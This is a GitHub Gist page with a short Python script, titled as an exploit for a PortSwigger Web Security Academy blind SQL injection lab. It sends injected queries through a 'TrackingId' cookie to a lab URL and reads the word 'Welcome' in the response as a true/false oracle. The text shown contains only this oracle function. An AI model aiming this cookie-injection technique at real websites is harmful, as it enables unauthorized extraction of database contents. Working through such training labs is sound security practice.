Skip to content

Instantly share code, notes, and snippets.

View luizmlo's full-sized avatar
👾

Luiz Melo luizmlo

👾
  • Brasil
View GitHub Profile
@luizmlo
luizmlo / exploit.py
Created November 7, 2021 03:26
Port Swigger Academy - Blind SQL Injection #1
import requests, string
def test_query(query=''):
url = 'https://aca51f221ea83843c0901b2000f9001f.web-security-academy.net/'
base_value = 'buBwSd5frbC0rTFR'
payload = base_value + query
vuln_cookies = {'TrackingId':payload}
r = requests.get(url, cookies=vuln_cookies).text
return True if len(r.split('Welcome')) > 1 else False